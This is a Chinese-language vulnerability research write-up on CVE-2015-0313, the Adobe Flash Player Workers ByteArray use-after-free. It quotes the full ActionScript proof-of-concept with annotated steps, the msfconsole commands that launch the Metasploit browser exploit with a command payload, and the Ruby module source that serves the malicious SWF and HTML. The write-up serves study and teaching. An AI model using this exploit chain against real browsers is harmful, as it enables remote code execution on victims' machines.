CVE-2015-0313 Investigation

趋势科技公司于 2015 年 2 月曝光了一个 Adobe Flash 0day 被外部恶意利用的信息，访问被该漏洞挂马的网站会自动下载恶意软件或弹出恶意广告等，影响甚广。该 Adobe Flash 0day 被命名为 CVE-2015-0313 Adobe Flash Player Workers ByteArray UAF 漏洞，其漏洞利用能够让攻击者实现任意代码执行

影响范围：

Adobe Flash Player before 13.0.0.269 and 14.x through 16.x before 16.0.0.305 on Windows and OS X and before 11.2.202.442 on Linux

漏洞分析

开启 hpa 调试运行 FlashPlayer 并打开样本，程序因触发 Access Violation 异常而崩溃。逆向 AVM 有点折磨所以直接从 样本 源码入手进行分析

// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 2. Be support to support 16.0 as target-player (flex-config.xml).
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
//      (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
// 5. Build with: mxmlc -o msf.swf Main.as

// Original code by @hdarwin89 // http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
// Modified to be used from msf
package
{
import flash.display.Sprite
import flash.display.LoaderInfo
import flash.events.Event
import flash.utils.ByteArray
import flash.system.Worker
import flash.system.WorkerDomain
import flash.system.MessageChannel
import flash.system.ApplicationDomain
import avm2.intrinsics.memory.casi32
import mx.utils.Base64Decoder

public class Exploit extends Sprite
{
    private var ov:Vector.<Object> = new Vector.<Object>(80000)
    private var uv:Vector.<uint>
    private var ba:ByteArray = new ByteArray()
    private var worker:Worker
    private var mc:MessageChannel
    private var b64:Base64Decoder = new Base64Decoder()
    private var payload:ByteArray
    private var platform:String
    private var os:String
    private var exploiter:Exploiter

    public function Exploit()
    {
        if (Worker.current.isPrimordial) mainThread() //* 在构造函数中判断是否为主线程并分别执行对应函数
        else workerThread()
    }

    private function mainThread():void
    {
        platform = LoaderInfo(this.root.loaderInfo).parameters.pl
        os = LoaderInfo(this.root.loaderInfo).parameters.os
        var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
        var pattern:RegExp = / /g;
        b64_payload = b64_payload.replace(pattern, "+")
        b64.decode(b64_payload)
        payload = b64.toByteArray()

        ba.length = 0x1000
        ba.shareable = true
        for (var i:uint = 0; i < ov.length; i++) {
            ov[i] = new Vector.<uint>(1014)
            ov[i][0] = 0xdeedbeef
        }
        for (i = 0; i < 70000; i += 2) {
            delete(ov[i])
        }
        worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) //* 创建后台 worker
        mc = worker.createMessageChannel(Worker.current)
        mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage) //* 设置事件监听函数
        worker.setSharedProperty("mc", mc)
        worker.setSharedProperty("ba", ba)
        ApplicationDomain.currentDomain.domainMemory = ba //* 将可分享的 ByteArray 对象设置为全局可用
        worker.start()
    }

    private function workerThread():void
    {
        var ba:ByteArray = Worker.current.getSharedProperty("ba")
        var mc:MessageChannel = Worker.current.getSharedProperty("mc")
        ba.clear() //* 清理共享内存 ByteArray
        ov[0] = new Vector.<uint>(1022) //* 每个 Unit Vector 长度为 1022，大小为 1022*4+8=0x1000，即 ba 的大小
        mc.send("") //* 发送消息给主线程
        while (mc.messageAvailable);
        for (var i:uint = 0;; i++) {
            if (ov[0][i] == 1014 && ov[0][i + 2] == 0xdeedbeef) {
                ov[0][i] = 0xffffffff
                break
            }
        }
        ov[0][0xfffffffe] = 1014
        mc.send("")
    }

    private function onMessage(e:Event):void
    {
        var mod:uint = casi32(0, 1022, 0xFFFFFFFF) //* 比较并交换 domainMemory 地址的变量值
        Logger.log("[*] Exploit - onMessage(): mod: " + mod.toString())
        if (mod == 1022) mc.receive()
        else {            
            for (var i:uint = 0; i < ov.length; i++) {
                if (ov[i].length == 0xffffffff) {
                    uv = ov[i]
                } else {
                    if (ov[i] != null) {
                        delete(ov[i])
                        ov[i] = null
                    }
                }
            }
            if (uv == null) {
                Logger.log("[!] Exploit - onMessage(): Corrupted Vector not found")
                return
            }
            exploiter = new Exploiter(this, platform, os, payload, uv)
        }
    }
}
}

具体函数内进行的操作已标记在注释中。总结下来漏洞的触发流程是

1. 在主 worker 中创建子 worker，然后 worker 间共享 ByteArray 数据
2. 在主 worker 中将共享的 ByteArray 对象设置为 domainMemory
3. 在子 worker 中通过 ByteArray.Clear 将共享的 ByteArray 内存清除
4. 但是这时候 domainMemory 依然可以引用共享的内存区域，这是因为子 worker 调用 clear 清除内存的时候没有通知 domainMemory 修改对共享的引用

因此导致 UAF 漏洞

漏洞利用

使用 MSF 搜索该漏洞的 exp

msfconsole
msf6 > search cve-2015-0313

搜索结果

Matching Modules
================

   #  Name                                                       Disclosure Date  Rank   Check  Description
   -  ----                                                       ---------------  ----   -----  -----------
   0  exploit/windows/browser/adobe_flash_worker_byte_array_uaf  2015-02-02       great  No     Adobe Flash Player ByteArray With Workers Use After Free


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/browser/adobe_flash_worker_byte_array_uaf

调用该模块并查看模块详情

msf6 > use exploit/windows/browser/adobe_flash_worker_byte_array_uaf
msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > info

模块详情信息

       Name: Adobe Flash Player ByteArray With Workers Use After Free
     Module: exploit/windows/browser/adobe_flash_worker_byte_array_uaf
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2015-02-02

Provided by:
  Unknown
  hdarwin
  juan vazquez <juan.vazquez@metasploit.com>

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Retries  true             no        Allow the browser to retry the module
  SRVHOST  *******          yes       The local host or network interface to listen on. This must be an address on the local machine or ******* to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

Description:
  This module exploits a use-after-free vulnerability in Adobe Flash Player. The
  vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
  is freed from an ActionScript worker, which can fill the memory and notify the main
  thread to corrupt the new contents. This module has been tested successfully on
  Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 16.0.0.296.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-0313
  https://helpx.adobe.com/security/products/flash-player/apsa15-02.html
  http://hacklab.kr/flash-cve-2015-0313-%EB%B6%84%EC%84%9D/
  http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2015-0313-the-new-flash-player-zero-day/


View the full module info with the info -d command.

使用该模块生成木马

msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > set payload windows/exec
msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > set CMD calc.exe
msf6 exploit(windows/browser/adobe_flash_worker_byte_array_uaf) > exploit

随后 MSF 将在本地启动 Web Server 并在攻击目标访问时为其响应异常 HTML 页面以触发漏洞

Exploit 分析

该模块的 exp 位于

/usr/share/metasploit-framework/modules/exploits/windows/browser/adobe_flash_worker_byte_array_uaf.rb

exp 的核心代码为

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray With Workers Use After Free',
      'Description'         => %q{...},
      'License'             => MSF_LICENSE,
      'Author'              => [...],
      'References'          => [...],
      'Payload'             => {...},
      'Platform'            => 'win',
      'BrowserRequirements' => {
          :source  => /script|headers/i,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
          :flash   => lambda { |ver| ver =~ /^16\./ && Rex::Version.new(ver) <= Rex::Version.new('16.0.0.296') },
          :arch    => ARCH_X86
        },
      'Targets'             => [...],
      'Privileged'          => false,
      'DisclosureDate'      => '2015-02-02',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf
    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    platform_id = 'win'
    os_name = target_info[:os_name]

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0313', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end

利用思路与分析的 PoC 和常规 UAF 漏洞利用一致，在此不再赘述

漏洞修复

Adobe 禁止了将具有共享属性的 ByteArray 设置为 domainMemory 进而阻止了 UAF 修复了此漏洞

Reference

Trend - Adobe Flash Player Unspecified Vulnerability (CVE-2015-0313)
ExploitDB - CVE-2015-0313
Microsoft 安全公告 MS14-012 - 严重
NVD - CVE-2015-0313
CVE - CVE-2015-0313
漏洞战争